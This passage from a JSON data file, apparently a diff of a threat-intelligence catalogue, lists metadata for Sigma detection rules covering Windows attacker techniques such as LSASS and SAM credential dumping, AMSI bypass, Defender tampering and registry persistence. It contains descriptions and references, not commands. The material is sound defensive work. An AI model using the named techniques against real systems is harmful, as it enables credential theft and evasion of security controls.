bundled tool named DumpMinitool.exe", - "uuid": "dee0a7a3-f200-4112-a99b-952196d81e42", - "value": "DumpMinitool Usage", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg", - "https://twitter.com/mrd0x/status/1511489821247684615", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": 
"2022/04/06", - "filename": "proc_creation_win_proc_dump_dumpminitool.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "uuid": "6355a919-2e97-4285-a673-74645566340d", - "value": "RdrLeakDiag Process Dump", - "meta": { - "refs": [ - "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/01/04", - "filename": "proc_creation_win_proc_dump_rdrleakdiag.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious ways to use of a Visual Studio bundled tool named DumpMinitool.exe", - "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", - "value": "Suspicious DumpMinitool Usage", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586", - "https://twitter.com/mrd0x/status/1511489821247684615", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" - ], - "creation_date": "2022/04/06", - "filename": "proc_creation_win_proc_dump_susp_dumpminitool.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect suspicious parent processes of well-known Windows processes", - "uuid": 
"96036718-71cc-4027-a538-d1587e0006a7", - "value": "Windows Processes Suspicious Parent Directory", - "meta": { - "refs": [ - "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", - "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", - "https://attack.mitre.org/techniques/T1036/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036.005" - ], - "creation_date": "2019/02/23", - "filename": "proc_creation_win_proc_wrong_parent.yml", - "author": "vburov", - "level": "low", - "falsepositive": [ - "Some security products seem to spawn these" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Emulates attack via documents through protocol handler in Microsoft Office. 
On successful execution you should see Microsoft Word launch a blank file.", - "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", - "value": "ProtocolHandler.exe Downloaded Suspicious File", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_protocolhandler_susp_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/07/13", - "filename": "proc_creation_win_protocolhandler_susp_file.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "uuid": "af77cf95-c469-471c-b6a0-946c685c4798", - "value": "Proxy Execution via Wuauclt", - "meta": { - "refs": [ - "https://dtm.uk/wuauclt/", - "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_proxy_execution_wuauclt.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a PsExec service start", - "uuid": "3ede524d-21cc-472d-a3ce-d21b568d8db7", - "value": "PsExec Service Start", - "meta": { - "refs": [ - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml" - ], - "tags": [ - "attack.execution", - "attack.s0029", - "attack.t1569.002" - ], - "creation_date": "2018/03/13", - "filename": "proc_creation_win_psexesvc_start.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload.", - "uuid": "4f927692-68b5-4267-871b-073c45f4f6fe", - "value": "PowerShell AMSI Bypass Pattern", - "meta": { - "refs": [ - "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psh_amsi_bypass_pattern_nov22.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" - ], - "creation_date": "2022/11/04", - "filename": "proc_creation_win_psh_amsi_bypass_pattern_nov22.yml", - "author": "@Kostastsale", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "value": "DefenderCheck Usage", - "meta": { - "refs": [ - "https://github.com/matterpreter/DefenderCheck", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.005" - ], - "creation_date": "2022/08/30", - "filename": "proc_creation_win_pua_defendercheck.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "uuid": "38646daa-e78f-4ace-9de0-55547b2d30da", - "value": "Seatbelt PUA Tool", - "meta": { - "refs": [ - "https://github.com/GhostPack/Seatbelt", - "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" - ], - "creation_date": "2022/10/18", - "filename": "proc_creation_win_pua_seatbelt.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", - "uuid": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "value": "Parent in Public Folder Suspicious Process", - "meta": { - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/25", - "filename": "proc_creation_win_public_folder_parent.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", - "value": "PurpleSharp Indicator", - "meta": { - "refs": [ - "https://github.com/mvelazc0/PurpleSharp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml" - ], - "tags": [ - "attack.t1587", - "attack.resource_development" - ], - "creation_date": "2021/06/18", - "filename": "proc_creation_win_purplesharp_indicators.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", - "uuid": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "value": "Registry Parse with Pypykatz", - "meta": { - "refs": [ - "https://github.com/skelsec/pypykatz", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pypykatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2022/01/05", - "filename": "proc_creation_win_pypykatz.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - 
"Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects python spawning a pretty tty", - "uuid": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", - "value": "Python Spawning Pretty TTY on Windows", - "meta": { - "refs": [ - "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/03", - "filename": "proc_creation_win_python_pty_spawn.yml", - "author": "Nextron Systems", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "uuid": "0685b176-c816-4837-8e7b-1216f346636b", - "value": "Quarks PwDump Usage", - "meta": { - "refs": [ - "https://github.com/quarkslab/quarkspwdump", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2022/09/05", - "filename": "proc_creation_win_quarks_pwdump.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.", - "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd", - "value": "Query Registry", - "meta": { - "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.t1007" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_query_registry.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "low", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", - "uuid": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "value": "Query Usage To Exfil Data", - "meta": { - "refs": [ - "https://twitter.com/MichalKoczwara/status/1553634816016498688", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_session_exfil.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_query_session_exfil.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This command line patterns found in BlackByte Ransomware operations", - "uuid": "999e8307-a775-4d5f-addc-4855632335be", - "value": "BlackByte Ransomware Patterns", - "meta": { - "refs": [ - "https://redcanary.com/blog/blackbyte-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ransom_blackbyte.yml" - ], - "tags": "No established tags", - "creation_date": "2022/02/25", - "filename": "proc_creation_win_ransom_blackbyte.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": 
"process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", - "uuid": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", - "value": "Raspberry Robin Dot Ending File", - "meta": { - "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_raspberry_robin_single_dot_ending_file.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/10/28", - "filename": "proc_creation_win_raspberry_robin_single_dot_ending_file.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects RDP session hijacking by using MSTSC shadowing", - "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", - "value": "MSTSC Shadowing", - "meta": { - "refs": [ - "https://twitter.com/kmkz_security/status/1220694202301976576", - "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_hijack_shadowing.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1563.002" - ], - "creation_date": "2020/01/24", - "filename": "proc_creation_win_rdp_hijack_shadowing.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers", - "uuid": "ab9e3b40-0c85-4ba1-aede-455d226fd124", - "value": 
"Suspicious Redirection to Local Admin Share", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml" - ], - "tags": "No established tags", - "creation_date": "2022/01/16", - "filename": "proc_creation_win_redirect_local_admin_share.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", - "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", - "value": "Cmd Stream Redirection", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2022/02/04", - "filename": "proc_creation_win_redirect_to_stream.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "uuid": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "value": "RedMimicry Winnti Playbook Execute", - "meta": { - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redmimicry_winnti_proc.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - 
"attack.t1059.003", - "attack.t1218.011" - ], - "creation_date": "2020/06/24", - "filename": "proc_creation_win_redmimicry_winnti_proc.yml", - "author": "Alexander Rausch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the export of a crital Registry key to a file.", - "uuid": "82880171-b475-4201-b811-e9c826cd5eaa", - "value": "Exports Critical Registry Keys To a File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1012" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_regedit_export_critical_keys.yml", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "level": "high", - "falsepositive": [ - "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the export of the target Registry key to a file.", - "uuid": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", - "value": "Exports Registry Key To a File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1012" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_regedit_export_keys.yml", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate export of keys" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the import of the specified file to the registry with regedit.exe.", - "uuid": "73bba97f-a82d-42ce-b315-9182e76c57b1", - "value": "Imports Registry Key From a File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2020/10/07", - "filename": "proc_creation_win_regedit_import_keys.yml", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate import of keys", - "Evernote" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "value": 
"Imports Registry Key From an ADS", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_regedit_import_keys_ads.yml", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", - "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", - "value": "Modifies the Registry From a File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_win_regini.yml", - "author": "Eli Salem, Sander Wiebing, oscd.community", - "level": "low", - "falsepositive": [ - "Legitimate modification of keys" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "uuid": "77946e79-97f1-45a2-84b4-f37b5c0d8682", - "value": "Modifies the Registry From a ADS", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regini/", - 
"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini_ads.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_regini_ads.yml", - "author": "Eli Salem, Sander Wiebing, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", - "uuid": "de587dce-915e-4218-aac4-835ca6af6f70", - "value": "Reg Add RUN Key", - "meta": { - "refs": [ - "https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/", - "https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2021/06/28", - "filename": "proc_creation_win_reg_add_run_key.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. 
Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", - "value": "Add SafeBoot Keys Via Reg Utility", - "meta": { - "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/09/02", - "filename": "proc_creation_win_reg_add_safeboot.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Qbot used reg.exe to add Defender folder exceptions for folders within AppData and ProgramData.", - "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", - "value": "Registry Defender Exclusions", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", - "https://redcanary.com/threat-detection-report/threats/qbot/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_reg_defender_exclusion.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects reg command lines that disable certain important features of Microsoft Defender", - "uuid": "452bce90-6fb0-43cc-97a5-affc283139b3", - "value": "Registry Defender Tampering", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/03/22", - "filename": "proc_creation_win_reg_defender_tampering.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Rare legitimate use by administrators to test software (should always be investigated)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "uuid": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", - "value": "Delete SafeBoot Keys Via Reg Utility", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/08", - "filename": "proc_creation_win_reg_delete_safeboot.yml", - "author": "Nasreddine Bencherchali, Tim Shelton", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. 
Often used by attacker to remove AV software services", - "uuid": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", - "value": "Delete Services Via Reg Utility", - "meta": { - "refs": [ - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_reg_delete_services.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored", - "uuid": "038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e", - "value": "Registry Dump of SAM Creds and Secrets", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dump_sam.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "creation_date": "2022/01/05", - "filename": "proc_creation_win_reg_dump_sam.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys", - "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536", - "value": "Enabling RDP Service via Reg.exe", 
- "meta": { - "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" - ], - "creation_date": "2022/02/12", - "filename": "proc_creation_win_reg_enable_rdp.yml", - "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility", - "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97", - "value": "Imports Registry Key From a File Using Reg.exe", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml" - ], - "tags": [ - "attack.t1112", - "attack.defense_evasion" - ], - "creation_date": "2022/08/01", - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml", - "author": "frack113, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate import of keys" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects reg command lines that disables PPL on the LSA process", - "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", - "value": "Registry Disabling LSASS PPL", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml" - ], - "tags": [ - 